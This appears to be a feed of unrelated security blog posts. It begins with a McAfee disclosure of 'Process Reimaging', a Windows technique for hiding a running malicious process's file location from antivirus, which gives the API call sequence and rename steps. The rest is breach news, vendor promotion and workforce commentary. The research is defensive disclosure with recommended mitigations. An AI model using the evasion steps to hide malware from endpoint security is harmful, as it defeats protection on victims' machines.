Process Manipulation defense evasion techniques continue to evolve. Process Doppelganging was publicly announced in 2017, requiring advancements in ESSs for protection and detection capabilities. Because process manipulation techniques generally exploit legitimate features of the Windows Operating system they can be difficult to defend against if the Antivirus scanner does not block prior to process launch.

Process Hollowing

Process hollowing occurs when a process is created in a suspended state then its memory is unmapped and replaced with malicious code. Execution of the malicious code is masked under a legitimate process and may evade defenses and detection analysis” (see figure 2 below)

Figure 2 – SynAck Ransomware Defense Evasion with Process Hollowing

Process Doppelganging

Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging’s use of Windows Transactional NTFS (TxF) also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext” (see figure 3 below)

Figure 3 – SynAck Ransomware Defense Evasion with Doppleganging

Process Reimaging Weaponization

The Windows Kernel APIs return stale and inconsistent FILE_OBJECT paths which enable an adversary to bypass windows operating system process attribute verification. This allows an adversary to persist a malicious process (post exploitation) by hiding the physical location of a process EXE (see figure 4 below).

Figure 4 – SynAck Ransomware Defense Evasion with Process Reimaging

Process Reimaging Technical Deep Dive

NtQueryInformationProcess retrieves all process information from EPROCESS structure fields in the kernel and NtQueryVirtualMemory retrieves information from the Virtual Address Descriptors (VADs) field in EPROCESS structure.

The EPROCESS structure contains filename and path information at the following fields/offsets (see figure 5 below):

  • +0x3b8 SectionObject (filename and path)
  • +0x448 ImageFilePointer* (filename and path)
  • +0x450 ImageFileName (filename)
  • +0x468 SeAuditProcessCreationInfo (filename and path)

* this field is only present in Windows 10

Figure 5 – Code Complexity IDA Graph Displaying NtQueryInformationProcess Filename APIs within NTDLL

Kernel API NtQueryInformationProcess is consumed by following the kernelbase/NTDLL APIs:

  • K32GetModuleFileNameEx
  • K32GetProcessImageFileName
  • QueryFullProcessImageImageFileName

The VADs hold a pointer to FILE_OBJECT for all mapped images in the process, which contains the filename and filepath (see figure 6 below).

Kernel API NtQueryVirtualMemory is consumed by following the kernelbase/NTDLL API:

  • GetMappedFileName

Figure 6 – Code Complexity IDA Graph Displaying NtQueryVirtualMemory Filename API within NTDLL

Windows fails to update any of the above kernel structure fields when a FILE_OBJECT filepath is modified post-process creation. Windows does update FILE_OBJECT filename changes, for some of the above fields.

The VADs reflect any filename change for a loaded image after process creation, but they don’t reflect any rename of the filepath.

The EPROCESS fields also fail to reflect any renaming of the process filepath and only the ImageFilePointer field reflects a filename change.

As a result, the APIs exported by NtQueryInformationProcess and NtQueryVirtualMemory return incorrect process image file information when called by ESSs or other Applications (see Table 1 below).

Table 1 OS/Kernel version and API Matrix

Prerequisites for all Attack Vectors

Process Reimaging targets the post-exploitation phase, whereby a threat actor has already gained access to the target system. This is the same prerequisite of Process Hollowing or Doppelganging techniques within the Defense Evasion category of the Mitre ATT&CK framework.

Process Reimaging Attack Vectors
FILE_OBJECT Filepath Changes

Simply renaming the filepath of an executing process results in Windows OS returning the incorrect image location information for all APIs (See figure 7 below).  This impacts all Windows OS versions at the time of testing.

Figure 7 FILE_OBJECT Filepath Changes – Filepath Changes Impact all Windows OS versions

FILE_OBJECT Filename Changes

Filename Change >= Windows 10

Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName API (See figure 8.1.1 below). This has been confirmed to impact Windows 10 only.

Figure 8.1.1 FILE_OBJECT Filename Changes – Filename Changes impact Windows >= Windows 10

Per figure 8.1.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the correct filename changes due to a new EPROCESS field ImageFilePointer at offset 448.  The instruction there (mov r12, [rbx+448h]) references the ImageFilePointer from offset 448 into the EPROCESS structure.

Figure 8.1.2 NtQueryInformationProcess (Windows 10) – Windows 10 RS1 x64 ntoskrnl version 10.0.14393.0

Filename Change < Windows 10

Simply renaming the filename of an executing process results in Windows OS returning the incorrect image information for K32GetProcessImageFileName, GetModuleFileNameEx and QueryFullProcessImageImageFileName APIs (See figure 8.2.1 below). This has been confirmed to impact Windows 7 and Windows 8.

Figure 8.2.1 FILE_OBJECT Filename Changes – Filename Changes Impact Windows < Windows 10

Per Figure8.2.2 below, GetModuleFileNameEx and QueryFullProcessImageImageFileName will get the incorrect filename (PsReferenceProcessFilePointer references EPROCESS offset 0x3b8 SectionObject).

Figure 8.2.2 NtQueryInformationProcess (Windows 7 and 8) – Windows 7 SP1 x64 ntoskrnl version 6.1.7601.17514

LoadLibrary FILE_OBJECT reuse

LoadLibrary FILE_OBJECT reuse leverages the fact that when a LoadLibrary or CreateProcess is called after a LoadLibrary and FreeLibrary on an EXE or DLL, the process reuses the existing image FILE_OBJECT in memory from the prior LoadLibrary.

Exact Sequence is:

  1. LoadLibrary (path\filename)
  2. FreeLibrary (path\filename)
  3. LoadLibrary (renamed path\filename) or CreateProcess (renamed path\filename)

This results in Windows creating a VAD entry in the process at step 3 above, which reuses the same FILE_OBJECT still in process memory, created from step 1 above. The VAD now has incorrect filepath information for the file on disk and therefore the GetMappedFileName API will return the incorrect location on disk for the image in question.

The following prerequisites are required to evade detection successfully:

  • The LoadLibrary or CreateProcess must use the exact same file on disk as the initial LoadLibrary
  • Filepath must be renamed (dropping the same file into a newly created path will not work)

The Process Reimaging technique can be used in two ways with LoadLibrary FILE_OBJECT reuse attack vector:

  1. LoadLibrary (see figure 9 below)
    1. When an ESS or Application calls the GetMappedFileName API to retrieve a memory-mapped image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 9 LoadLibrary FILE_OBJECT Reuse (LoadLibrary) – Process Reimaging Technique Using LoadLibrary Impacts all Windows OS Versions

2. CreateProcess (See figure 10 below)

    1. When an ESS or Application calls the GetMappedFileName API to retrieve the process image file, Process Reimaging will cause Windows OS to return the incorrect path. This impacts all Windows OS versions at the time of testing.

Figure 10 LoadLibrary FILE_OBJECT Reuse (CreateProcess) – Process Reimaging Technique using CreateProcess Impacts all Windows OS Versions

Process Manipulation Techniques Comparison

Windows Defender Process Reimaging Filepath Bypass Demo

This video simulates a zero-day malware being dropped (Mimikatz PUP sample) to disk and executed as the malicious process “phase1.exe”. Using the Process Reimaging Filepath attack vector we demonstrate that even if Defender is updated with a signature for the malware on disk it will not detect the running malicious process. Therefore, for non-EDR ESSs such as Defender Real-time Protection (used by Consumers and also Enterprises) the malicious process can dwell on a windows machine until a reboot or the machine receives a full scan post signature update.

CVSS and Protection Recommendations

CVSS

If a product uses any of the APIs listed in table 1 for the following use cases, then it is likely vulnerable:

  1. Process reputation of a remote process – any product using the APIs to determine if executing code is from a malicious file on disk

CVSS score 5.0 (Medium)  https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N (same score as Doppelganging)

  1. Trust verification of a remote process – any product using the APIs to verify trust of a calling process

CVSS score will be higher than 5.0; scoring specific to Endpoint Security Solution architecture

Protection Recommendations

McAfee Advanced Threat Research submitted Process Reimaging technique to Microsoft on June 5th, 2018. Microsoft released a partial mitigation to Defender in the June 2019 Cumulative update for the Process Reimaging FILE_OBJECT filename changes attack vector only. This update was only for Windows 10 and does not address the vulnerable APIs in Table 1 at the OS level; therefore, ESSs are still vulnerable to Process Reimaging. Defender also remains vulnerable to the FILE_OBJECT filepath changes attack vector executed in the bypass demo video, and this attack vector affects all Windows OS versions.

New and existing Process Manipulation techniques which abuse legitimate Operating System features for defense evasion are difficult to prevent dynamically by monitoring specific API calls as it can lead to false positives such as preventing legitimate processes from executing.

A process which has been manipulated by Process Reimaging will be trusted by the ESS unless it has been traced by EDR or a memory scan which may provide deeper insight.

Mitigations recommended to Microsoft
  1. File System Synchronization (EPROCESS structures out of sync with the filesystem or File Control Block structure (FCB)
    1. Allow the EPROCESS structure fields to reflect filepath changes as is currently implemented for the filename in the VADs and EPROCESS ImageFilePointer fields.
    2. There are other EPROCESS fields which do not reflect changes to filenames and need to be updated, such as K32GetModuleFileNameEx on Windows 10 through the ImageFilePointer.
  2. API Usage (most returning file info for process creation time)
    1. Defender (MpEngine.dll) currently uses K32GetProcessImageFileName to get process image filename and path when it should be using K32GetModuleFileNameEx.
    2. Consolidate the duplicate APIs being exposed from NtQueryInformationProcess to provide easier management and guidance to consumers that require retrieving process filename information. For example, clearly state GetMappedFileName should only be used for DLLs and not EXE backing process).
    3. Differentiate in API description whether the API is only limited to retrieving the filename and path at process creation or real-time at time of request.
  3. Filepath Locking
    1. Lock filepath and name similar to lock file modification when a process is executing to prevent modification.
    2. Standard user at a minimum should not be able to rename binary paths for its associated executing process.
  4. Reuse of existing FILE_OBJECT with LoadLibrary API (Prevent Process Reimaging)
    1. LoadLibrary should verify any existing FILE_OBJECT it reuses, has the most up to date Filepath at load time.
  5. Short term mitigation is that Defender should at least flag that it found malicious process activity but couldn’t find associated malicious file on disk (right now it fails open, providing no notification as to any potential threats found in memory or disk).
Mitigation recommended to Endpoint Security Vendors

The FILE_OBJECT ID must be tracked from FileCreate as the process closes its handle for the filename by the time the image is loaded at ImageLoad.

This ID must be managed by the Endpoint Security Vendor so that it can be leveraged to determine if a process has been reimaged when performing process attribute verification.

The post In NTDLL I Trust – Process Reimaging and Endpoint Security Solution Bypass appeared first on McAfee Blogs.

Make Seqrite UTM the first line of defense for your enterprise

Estimated reading time: 2 minutes

Network security has traditionally been a number one priority for enterprises. As the reliance on the Internet has increased, enterprises have invested in traditional network security solutions which aim to protect trusted internal networks from external actors. For this purpose, enterprises have invested in solutions like a firewall that stands at the perimeter of a company’s network and monitors and controls incoming and outgoing security traffic. Similarly, organizations have also invested in Unified Threat Management (UTM) solutions which combine and integrate multiple security devices for protection.

Enterprises can consider Seqrite’s Unified Threat Management (UTM) which combines multi-layered cybersecurity strategies for businesses, thereby safeguarding the entire IT framework while rendering it productive, secure and stable. Seqrite is one reliable security service provider that offers UTM as a gateway security solution. Seqrite’s UTM offers a host of features for enterprises in areas of networking, administration, content filtering, VPN, monitoring and reporting, mail protection, firewall, security services and user authentication.

Unified Threat Management is a holistic service that comes forth with the features like content filtering, VPN, firewall and anti-virus protection clubbed under a single dashboard. Some of the key features of UTM which can serve as the first line of defense for your enterprise are:

  • Gateway Antivirus

The Gateway Antivirus feature scans all incoming and outgoing network traffic at the gateway level. This helps to augment existing virus solutions by reducing the window of vulnerability (WoV) as threats are detected and dealt with right at the network level, hence preventing their entry into the rest of the enterprise.

  • IPS

Through the Intrusion Prevention System (IPS) feature, network traffic is scanned in real-time. This helps prevent a broad range of Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks even before they can penetrate the network. IPS can also configure rules, policies and required actions upon capturing these alarms.

  • Firewall Protection

With the best-in-class firewall protection, network administrators can permit or block access for traffic between internal and external networks based on enterprise compliance policies.

  • URL Filtering

When it comes to selecting a functional UTM solution, spam blocking and URL filtering need to be prioritized. These components are the building blocks of an enterprise-level network security solution and a key feature within reliable UTM products. URL filtering helps block risky websites and when paired with spam filtering, can also block the entry of spam mails and certain forms of phishing attacks. Seqrite UTM’s URL Filtering feature allows blocking of non-business related web traffic including streaming media sites, downloads, instant messaging etc. in order to reduce unnecessary load on enterprise bandwidth.

  • Gateway Mail Protection

Thanks to the Gateway Mail Protection features, enterprises can be sure that they are protected from malicious emails and Business Email Compromise (BEC) attacks. This feature scans incoming/outgoing emails or attachments at the gateway level to block spam and phishing emails before they enter the network.

  • Load Balancing

This feature allows the distribution of bandwidth across multiple ISPs within the enterprise network and enables these ISPs to operate over the same gateway channels. Multiple ISPs can be used by Seqrite UTM through this feature. Traffic is balanced across multiple ISP lines based on weightage and priority.

The above pointers make it quite clear why Seqrite Unified Threat Management (UTM) has the power and tools required for enterprises to make it their first line of defense against cyber attacks.

The post Make Seqrite UTM the first line of defense for your enterprise appeared first on Seqrite Blog.

Medical debt collection agency files for bankruptcy protection after data breach

A US medical bill and debt collection agency has filed for Chapter 11 bankruptcy protection after suffering a data breach that exposed the sensitive personal data of at least 20 million people.

Compromised data included names, addresses, dates of birth and Social Security numbers – data that could be used to commit fraud and identity theft.

RMCB (the Retrieval-Masters Creditors Bureau) – the parent company of AMCA (the American Medical Collection Agency) – listed assets and liabilities of up to $10 million and estimated that it had between 100 and 199 creditors.

The company’s founder and CEO Russell H. Fuchs said in a court declaration that the breach had prompted a “cascade of events” resulting in “enormous expenses that were beyond [its] ability […] to bear”.

These included spending more than $3.8 million on notifying more than 7 million individuals that their personal data had potentially been compromised – $2.5 million of which Fuchs loaned the company himself.

Chapter 11 filings help businesses restructure their debts and assets, and wind up their affairs in an orderly manner.

Undetected data breach

AMCA was hacked over an eight-month period from 1 August 2018 to 30 March 2019.

Gemini Advisory, which alerted it to the incident, explains that it first identified information stolen from the company on 28 February.

The next day, it “made several unsuccessful attempts to contact AMCA in order to alert the victims” before informing federal law enforcement.

Databreaches.net first reported the incident on 10 May, using information provided by Gemini Research, but was unable to elicit any comment from AMCA.

Customer data exposed

According to ZDNet, companies that used AMCA’s payment portal to bill their medical customers include Quest Diagnostics (12 million exposed records), LabCorp (8 million), BioReference Laboratories (423,000), Carecentrix (500,000) and Sunrise Laboratories (unknown number).

All have either “terminated or substantially curtailed their business relationships” with AMCA, Fuchs said.

The real price of a data breach

RMCB/AMCA has been in business since 1977. Following the breach, it was forced to reduce its headcount by 88 to 25. Moreover, it is not “optimistic that it will be able to rehabilitate its business”.

After more than 40 years, this will be a bitter blow.

The lesson to be learned is that all organisations are at risk from cyber attacks and that the results can be disastrous.

Defending against cyber attacks is therefore critical.

Cyber security boot camp

If you need to improve your cyber security quickly, you can get all the support you need on our cyber security boot camp.

Download our free Cyber Security Combat Plan and discover:

  • The five defensive measures you should take to protect your organisation from cyber attacks;
  • The benefits and the risks associated with each of them; and
  • How to build a business case for implementing them.

Enlist now >>

Cyber Security boot camp

The post Medical debt collection agency files for bankruptcy protection after data breach appeared first on IT Governance Blog.

Welcoming Cloudbric’s new CSO for strategic planning and investor relations

We’re excited to announce that Yujin (Gin) Hyeon has joined Cloudbric as Chief Strategic Officer (CSO).

As Cloudbric’s new CSO, Gin will be driving corporate strategy and investor relations to take the next big step forward. As a veteran of the tech industry, Gin’s experience with early stage companies from growth stage to IPOs will be pivotal for Cloudbric’s continued development. Given his track record, we are very excited to have him join our roster.

To give some background, Gin was a Co-Founder of Com2uS, one of the world’s first mobile gaming companies, which was established in 1996 and known for games like Summoners War: Sky Arena, Ace Fishing, Golf Star, and Tiny Farm.

His role was twofold with on hand on the business side and another on product development. On the business side Gin was focused on acquiring funding for the team and expanding business overseas, including the opening of regional offices in London, Bangalore, Los Angeles and Singapore.

On the product development end, he helped the company achieve its strategic goals and moved product development by co-developing the product lineup.

Some highlights while working with Com2uS include developing and negotiating contractual agreements with license holders, mobile telecommunications carriers, and other strategic partners, successfully completing agreements with 64 mobile telecommunications operators in 32 countries.

Notably, he also developed strategic partnerships with Samsung Electronics, Nokia, Motorola, Sony Ericsson, Siemens, Sun Microsystems, Qualcomm, and YAHOO.

It doesn’t end with just Com2uS!

Gin worked for INKA ENTWORKS, which specializes in security solutions and is known worldwide as one of the leading DRM (Digital Rights Management) technology companies.

With the launch of AppSealing, a software that prevents hacking for mobile applications, Gin, as Senior VP, oversaw the strategic and business plans for the solution all while implementing a China strategy before launching it into an incubation program.

He also worked for a company called ASCAN, a document management and record archiving company based in Korea that uses AI, serving as COO.

In between balancing both operating and strategic planning, Gin also helped acquire overseas funding for the company.

Amongst his experience in the tech industry, Gin has accumulated over 15 years of experience in consulting and grant writing too.

He has worked in consulting for companies like Fairways Consulting Services (a company focused on preparing businesses to enter the Indian market) and Brilliant Rise, a Hong Kong based company composed of former executives in the various fields of technology and internet to provide consulting services, project management, and merger & acquisition services.

Mostly recently, as the previous CSO to the Korean product design and development startup PiQuant, he oversaw the investor relation management aspect of the business and their strategic partnerships.

With his extensive experience in building company strategies across various industries and his huge investor network, we are excited to bring in Gin to the team as someone who can help us continue to grow.

Gin is joining the team at a time in which Cloudbric is seeing a 50% increase in the company’s workforce.

Welcome

환영합니다

स्वागत

Bienvenue Gin!

(Though a Korean national, Gin spent a total of 32 years in India. He speaks a total of five languages! English, Korean, Hindi, French, and Spanish).

Furthermore, as a company, we’re excited to continue growing and in various industries as well.

Recently, Cloudbric began providing security services to cryptocurrency exchanges blockchain businesses and has now delved into the operation of blockchain wallet nodes, utilizing its know-how in cloud computing services like AWS and others.

We aim to build blockchain nodes in our existing data centers and servers around the world to grow this business.


Make sure to follow us on our social media platforms (LinkedInTwitter, and Facebook) and our recently opened Telegram Announcement Channel for the latest updates!

The post Welcoming Cloudbric’s new CSO for strategic planning and investor relations appeared first on Cloudbric.

Upcoming cybersecurity events featuring BH Consulting

Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy. 

ISACA Last Tuesday: Dublin, 25 June

BH Consulting COO Valerie Lyons will present a talk on building an emotionally intelligent security team, and the role that leadership plays in influencing team style. It will be an interactive and fun session with several takeaways and directions to free online tools to help analyse team member roles. The evening event will take place at the Carmelite Community Centre on Aungier Street in Dublin 2. Attendance is free; to register, visit this link

Data Protection Officer certification course: Vilnius/Maastricht June/July

BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here

IAM Annual Conference: Dublin, 28-30 August

Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

Collections Firm Behind LabCorp, Quest Breaches Files for Bankruptcy

A medical billing firm responsible for a recent eight-month data breach that exposed the personal information on nearly 20 million Americans has filed for bankruptcy, citing “enormous expenses” from notifying affected consumers and the loss of its four largest customers.

The filing, first reported by Bloomberg, comes from the Retrieval-Masters Creditors Bureau, the parent company of the American Medical Collection Agency (AMCA). Earlier this month, medical testing firm Quest Diagnostics said a breach at the AMCA between Aug. 1, 2018 and March 30, 2019 led to the theft of personal and medical information on 11.9 million patients.

On June 4, KrebsOnSecurity broke the news that another major AMCA client — LabCorp — was blaming the company for a breach affecting 7.7 million of its patients.

According to a bankruptcy filing, LabCorp and Quest Diagnostics both stopped sending the AMCA business after the breach disclosure, as did the AMCA’s two other biggest customers — Conduent Inc. and CareCentrix Inc.

Bloomberg reports the data breach created a “cascade of events,” which incurred “enormous expenses that were beyond the ability of the debtor to bear.”

“Those expenses included more than $3.8 million spent on mailing more than 7 million individual notices to people whose information had been potentially hacked,” wrote Jeremy Hill. Retrieval Masters CEO Russell H. Fuchs “personally lent the company $2.5 million to help pay for those mailings, he said in the declaration. In addition, IT professionals and consultants hired in connection with the breach had cost Retrieval-Masters about $400,000 by the time of the filing.”

Retrieval Masters said it learned of the breach after a significant number of credit cards people used to pay their outstanding medical bills via the company’s site ended up with fraud charges on them soon after. The company also reportedly slashed its staff from 113 to 25 at the end of 2018.

The bankruptcy filing may also be something of a preemptive strike: Retrieval-Masters is already facing at least three class-action lawsuits from plaintiffs in New York and California.

A copy of the bankruptcy filing is available here (PDF).

Live From Gartner Security & Risk Mgmt Summit: How to Approach Container Security

Container security is a topic most security practitioners still find confusing. It’s a new technology that’s spreading fast because of its numbers benefits, and security implications and solutions are evolving just as fast.

That’s why I really appreciated Anna Belak’s session “Container Security – From Image Analysis to Network Segmentation” at the Gartner Security & Risk Management Summit in National Harbor, MD. Anna provided a great framework for thinking about container security that I would like to share with you.

Divide and Conquer: Images, Orchestration, Runtime

After introducing the audience to all of the security challenges and attack vectors for containers, she broke down a container security program into three sections:

  • Securing container images
  • Securing the orchestration plane 
  • Securing containers at runtime 

Today, there’s no security vendor that helps with all three of these areas. Because Veracode focuses on application development security, we focus on securing container images, not the operational parts.

Inside the Sausage Factory: How the Docker Image is Made

A Docker container image is a lightweight, standalone, executable package of software that includes everything you need to run an application: code, runtime, system tools, system libraries and settings. Docker’s run utility is the command that actually launches a container. Each container is an instance of an image, and multiple container instances of the same image can be run simultaneously. Docker images are ephemeral: Container deployments are in constant flux. The average lifetime of a container is 30 minutes. 

The Docker Hub registry is a repository for sharing container images from open source projects and from software vendors. These images are leveraged by developers – often introducing additional risk to the organization.

In her talk, Anna referenced a study of 3,802 official images on the Docker Hub that found a median of 127 vulnerabilities per image. Even more shocking: There were zero images that did not have any vulnerabilities.

Gartner’s Top Recommendations on Container Security

The talk closed with three recommendations:

  • Secure containers holistically through integrating controls at key steps in the CI/CD pipeline. Focusing solely on runtime controls – as you would for software installed VMs – will leave you vulnerable at many ends.
  • Use secrets management and software component analysis as primary container protection strategies. Add Layer 7 network segmentation for operational containers that require defense in depth.
  • Select vendors that can integrate with the container offerings of leading cloud service providers, such as Amazon Web Services, Microsoft Azure, and Google Cloud Platform.

Veracode can help you with the first recommendation: Veracode Software Composition Analysis scans container images for vulnerabilities as part of your CI/CD pipeline to help you find vulnerabilities in the production image. If you’re interested in more information, read our blog post How Veracode Scans Docker Containers for Open Source Vulnerabilities

Embracing the “Sec” in DevSecOps: How Veracode and AWS Work Together to Help You Build Secure Apps

Developers, like most builders, are creative critical thinkers who take pride in their work. Let’s focus on the word “builder” for a moment. During the industrial revolution, we saw a shift in manufacturing where time-consuming processes were made more efficient through automation. With that, we also saw the concept of an assembly line and interchangeable parts transform businesses. The idea was to build as quickly as possible for less cost. Transpose this to software engineering and we see a similar trend: Building software as quickly as possible, using components, and decreasing costs. Implicit in this is the direct correlation between quality of the components and the quality of the final product. This begs the question: Why then are developers selecting poor or insecure components to build their applications? I would argue that the intention to build stable and secure software has always existed, but there is a general lack of awareness and overall confusion on the best approach. We need only look at the latest headlines and read about Fortune 500 companies that have been victims of vulnerabilities despite their best efforts to ship software they thought to be secure. So, how does intent go beyond a mere idea and put into design and practice to mitigate these concerns in the most comprehensive and reliable way possible?

Before we are able to answer that, it is important that we consider a few facts:

  1. Modern applications are complex and made up of various components.
  2. Open source has grown and has found its way into millions of applications across various industries spanning private, public, and even government sectors.
  3. Application security has traditionally been reactive and found later in the development life cycle.

Cloud adoption has made it easier for developers to be empowered to not only build their application, but also provision its supporting infrastructure. Take for example a fully-managed CI/CD pipeline on AWS comprised of AWS CodeCommit, AWS CodePipeline, and AWS CodeBuild with container deployments to AWS Fargate. If you find yourself in a similar scenario or aspire to migrate to AWS to use these services, then which tools do you use, and how do you leverage those correctly to ensure that you are building secure applications? If you are using open source components, then how do you ensure that you are using the right versions of components, or find out where those are being downloaded from? These questions extend to your container images as well. Container images are often opaque in that they typically contain various layers, but it is not immediately clear what security vulnerabilities may be contained within each of those respectively. Are you including inspection of these into your automated workflows?

One of the more prominent blockers to applying security is the perception that doing so will undoubtedly negatively impact time to market. Developers are often under time constraints and are focused on building applications and releasing features as expeditiously as possible. This coupled with the complexity of modern architectures, use of external components and lack of prescriptive guidance on leveraging the right tools at the appropriate stage of the development life cycle leads to exacerbating frustration and the expected reaction is one of avoidance. In other words, we acknowledge the problem, vaguely understand there may be a way or ways to resolve it, but are not clear on how to accomplish that and determine it’s not worth the effort today, after all, there’s always tomorrow.

The truth is that this need not be as daunting as it may seem on the surface. The journey begins with understanding your process and gaining insights into your environment. If you don’t know where your vulnerabilities exist today, then how can you effectively solve them? Second, it’s about applying security at every stage of the process. There are several tools that address specific concerns and were built for specific audiences: Security teams, AppSec teams, Dev teams. Use them accordingly. For example, there is a place for static analysis (SAST), software composition analysis (SCA), dynamic analysis (DAST) testing and monitoring tools designed for finding security defects and completing the feedback loop. It’s critical to understand that you may build a secure application today, but can you quickly iterate and resolve for those vulnerabilities that have yet to be discovered before they negatively impact your business or your customers? These are considerations that are necessary for any business to survive in today’s competitive landscape. Sure, you need to ship features as quickly as possible, but you need to do so without compromising security.

This is where solutions such as those available today from Veracode are integral for any business. Veracode is a full spectrum application security testing solution that begins with Veracode Greenlight in the developers’ IDE and spans across the devevlopment lifecycle with Veracode Manual Penetration Testing. Along the way, you are covered throughout the entire software development life cycle. From the moment developers begin writing code and pushing commits, Veracode Software Composition Analysis (SCA) identifies any open source vulnerability and provides crisp remediation guidance. Integrate Veracode Static Analysis (SAST) into your build and test tools and processes to quickly identify security flaws in your code. Lastly, Veracode Dynamic Analysis (DAST) in your release, deployment and operations process reduces your risk of a breach once your application goes live. These are easily integrated with AWS CodePipeline and CodeBuild to secure your fully managed CI/CD pipelines running in the AWS cloud.

As the complexity of modern applications continues to increase over the years, so too does introducing security into every stage of your development life cycle become a necessity. We live in a highly competitive world with a voracious appetite for innovation. It is critical for businesses to deliver quickly and satisfy customer demand, but equally critical to ensure and preserve customer trust. It is possible to do both without compromising one for the other, and the solutions exist today.

Learn more at AWS re:Inforce this month in Boston – Veracode will be at Booth 813, and speaking on Wednesday the 26th on “Integrating AppSec Into Your DevSecOps on AWS.”

Expanding Our Vision to Expand the Cybersecurity Workforce

I recently had the opportunity to testify before Congress on how the United States can grow and diversify the cyber talent pipeline. It’s great that members of Congress have this issue on their radar, but at the same time, it’s concerning that we’re still having these discussions. A recent (ISC) Study puts the global cybersecurity workforce shortage at 2.93 million. Solving this problem is challenging, but I offered some recommendations to the House Homeland Security Committee’s Subcommittee on Cybersecurity, Infrastructure Protection and Innovation.

Increase the NSF CyberCorps Scholarships for Service Program

The National Science Foundation (NSF) together with the Department of Homeland Security (DHS) designed a program to attract more college students to cybersecurity, and it’s working. Ten to 12 juniors and seniors at each of the approximately 70 participating institutions across the country receive free tuition for up to two years plus annual stipends. Once they’ve completed their cybersecurity coursework and an internship, they go to work for the federal government for the same amount of time they’ve been in the program. Afterwards, they’re free to remain federal employees or move elsewhere, yet fortunately, a good number of them choose to stay.

Congress needs to increase the funding for this program (which has been flat since 2017) from $55 million to at least $200 million. Today the scholarships are available at 70 land grant colleges. The program needs to be opened up to more universities and colleges across the country.

Expand CyberCorps Scholarships to Community Colleges

Community colleges attract a wide array of students – a fact that is good for the cybersecurity profession. Some community college attendees are recent high school graduates, but many are more mature, working adults or returning students looking for a career change or skills training. A strong security operation requires differing levels of skills, so having a flexible scholarship program at a community college could not only benefit graduates but also provide the profession with necessary skills.

Furthermore, not everyone in cybersecurity needs a four-year degree. In fact, they don’t need to have a traditional degree at all. Certificate programs provide valuable training, and as employers, we should change our hiring requirements to reflect that reality.

Foster Diversity of Thinking, Recruiting and Hiring

Cybersecurity is one of the greatest technical challenges of our time, and we need to be as creative as possible to meet it. In addition to continually advancing technology, we need to identify people from diverse backgrounds – and not just in the standard sense of the term. We need to diversify the talent pool in terms of race, ethnicity, gender and age, all of which lead to creating an inclusive team that will deliver better results. However, we also should seek out gamers, veterans, people working on technical certificates, and retirees from computing and other fields such as psychology, liberal arts as well as engineering. There is no one background required to be a cybersecurity professional. We absolutely need people with deep technical skills, but we also need teams with diverse perspectives, capabilities and levels of professional maturity.

Public-Private Sector Cross Pollination

We also must develop creative approaches to enabling the public and private sectors to share talent, particularly during significant cybersecurity events. We should design a mechanism for cyber professionals – particularly analysts or those who are training to become analysts – to move back and forth between the public and private sector so that government organizations would have a continual refresh of expertise. This type of cross-pollination would help everyone share best practices on technology, business processes and people management.

One way to accomplish this would be for DHS to partner with companies and other organizations such as universities to staff a cadre of cybersecurity professionals – operators, analysts and researchers – who are credentialed to move freely between public and private sector service. These professionals, particularly those in the private sector, could be on call to help an impacted entity and the government respond to a major attack in a timely way. Much like the National Guard, a flexible staffing approach to closing the skills gap could become a model of excellence.

We’re Walking the Talk

McAfee is proud to support the community to establish programs that provide skills to help build the STEM pipeline, fill related job openings, and close gender and diversity gaps. These programs include an Online Safety Program, onsite training programs and internships for high school students. Our employees also volunteer in schools help educate students on both cybersecurity risks and opportunities. Through volunteer-run programs across the globe, McAfee has educated more than 500,000 children to date.

As part of the McAfee’s new pilot Achievement & Excellence in STEM Scholarship program, we’ll make three awards of $10,000 for the 2019-2020 school year. Twelve students from each of the three partner schools will be invited to apply, in coordination with each partner institution’s respective college advisor. Target students are college-bound, high school seniors with demonstrated passion for STEM fields, who are seeking a future in a STEM-related path. This type of a program can easily be replicated by other companies and used to support the growth and expansion of the workforce.

We’re Supporting Diversity

While we recognize there is still more to do in fostering diversity, we’re proud to describe the strides we’re making at McAfee. We believe we have a responsibility to our employees, customers and communities to ensure our workplace reflects the world in which we live. Having a diverse, inclusive workforce is the right thing to do, and after we became an independent, standalone cybersecurity company in 2017, we made and have kept this a priority.

 The steps we’re taking include:

  • Achieving pay parity between women and men employees in April 2019, making us the first pureplay cybersecurity company to do so.
  • In 2018, 27.1% of all global hires were female and 13% of all U.S. hires were underrepresented minorities.
  • In June 2018, we launched our “Return to Workplace” program for men and women who have paused their career to raise children, care for loved ones or serve their country. The 12-week program offers the opportunity to reenter the tech space with the support and resources needed to successfully relaunch careers.
  • Last year, we established the Diversity & Culture Council, a volunteer-led global initiative focused on creating an infrastructure for the development and maintenance of an integrated strategy for diversity and workplace culture.
  • McAfee CEO Chris Young joined CEO Action for Diversity Inclusion, the largest group of CEOs and presidents committed to act on driving an inclusive workforce. By taking part in CEO Action, Young personally commits to advancing diversity and inclusion with the coalition’s three-pronged approach of fostering safe workplaces.

Looking to the Future

While I’d love to see a future where fewer cybersecurity professionals were needed, I know that for the foreseeable future, we’ll not only need great technology but also talented people. With that reality, we in the industry need to expand our vision and definition of what constitutes cybersecurity talent. The workforce shortage is such that we have to do expand our concepts and hiring requirements. In addition, the discipline itself will benefit from a population that brings more experiences, skills and diversity to bear on a field that is constantly changing.

The post Expanding Our Vision to Expand the Cybersecurity Workforce appeared first on McAfee Blogs.

Helping organizations do more without collecting more data



